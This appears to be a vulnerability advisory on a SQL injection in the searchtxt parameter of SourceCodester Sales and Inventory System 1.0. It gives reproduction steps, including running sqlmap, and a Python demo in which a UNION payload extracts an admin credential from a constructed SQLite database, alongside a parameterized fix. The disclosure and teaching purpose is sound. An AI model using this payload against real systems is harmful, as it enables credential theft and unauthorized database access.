SourceCodester Sales and Inventory System SQL Injection Vulnerability in View Product Component

Vulnerability

A SQL injection vulnerability has been identified in SourceCodester Sales and Inventory System version 1.0. The flaw is in view_product.php, in the code that handles the HTTP POST request: the searchtxt parameter is incorporated into a database query without proper sanitization or parameterization, so an authenticated attacker can inject arbitrary SQL. The attack can be carried out remotely, and the injected SQL changes the queries the application runs against its database.

Impact

An authenticated attacker can use the injection to read administrator credentials from the database, bypass authentication with them, and execute arbitrary SQL to exfiltrate sensitive database information or manipulate database contents.

Reproduction

To reproduce, log in to the application, open the product list page, and submit SQL injection payloads through the search bar; the search term is sent as the searchtxt POST parameter. Alternatively, capture the search request with an intercepting proxy and pass the saved request to sqlmap, which automates the exploitation.
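
The following is an added example, not code from the Sales and Inventory System itself. The advisory does not show the query in view_product.php, so the vulnerable function below assumes the common pattern of concatenating searchtxt into a LIKE clause; the schema, table names and the sample admin row are constructed for the demonstration (SQLite is used in place of the application's database so the example runs offline). It shows a UNION payload pulling a stored credential through the searchtxt parameter, and the same search implemented with a bound parameter, which treats the payload as an ordinary search string.

```python
import sqlite3

ADMIN_PASSWORD_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"  # constructed sample value


def build_db():
    """Constructed sample database; not the real schema of the application."""
    conn = sqlite3.connect(":memory:")
    cur = conn.cursor()
    cur.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL)")
    cur.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [(1, "Keyboard", 25.0), (2, "Monitor", 150.0), (3, "Mouse", 10.0)],
    )
    cur.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    cur.execute("INSERT INTO users VALUES (?, ?, ?)", (1, "admin", ADMIN_PASSWORD_HASH))
    conn.commit()
    return conn


def vulnerable_query(searchtxt):
    """Assumed vulnerable pattern: searchtxt is spliced straight into the SQL text."""
    return ("SELECT id, name, price FROM products "
            "WHERE name LIKE '%" + searchtxt + "%'")


def vulnerable_search(conn, searchtxt):
    """Runs the concatenated query; any quote in searchtxt becomes SQL syntax."""
    return conn.execute(vulnerable_query(searchtxt)).fetchall()


def safe_search(conn, searchtxt):
    """Hardened form: the driver binds the value, so quotes stay inside the string."""
    sql = "SELECT id, name, price FROM products WHERE name LIKE ?"
    return conn.execute(sql, ("%" + searchtxt + "%",)).fetchall()


# Payload for the searchtxt POST parameter. The leading quote closes the LIKE
# string, the UNION appends rows from the users table with a matching column
# count, and "-- " comments out the trailing "%'" that the template would add.
PAYLOAD = "' UNION SELECT id, username, password FROM users-- "


def leaked_credentials(conn):
    """Returns (username, password) pairs the payload pulls out of the users table."""
    product_names = {"Keyboard", "Monitor", "Mouse"}
    return [(row[1], row[2]) for row in vulnerable_search(conn, PAYLOAD)
            if row[1] not in product_names]


if __name__ == "__main__":
    db = build_db()
    print("Generated SQL:", vulnerable_query(PAYLOAD))
    print("Vulnerable search leaks:", leaked_credentials(db))
    print("Parameterized search returns:", safe_search(db, PAYLOAD))
```

The vulnerable path returns the three products plus the admin row, because `LIKE '%'` matches everything and the UNION appends the users table; the parameterized path returns no rows for the same input, since no product name contains the literal payload. This is the behaviour to confirm when verifying a fix: the same payload must produce an empty result rather than a different error message.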

Added: Mar 23, 2026, 5:18 AM
Updated: Mar 23, 2026, 5:18 AM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 2.5
exploitability: 4.6
remediation: 0.0
relevance: 4.3
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.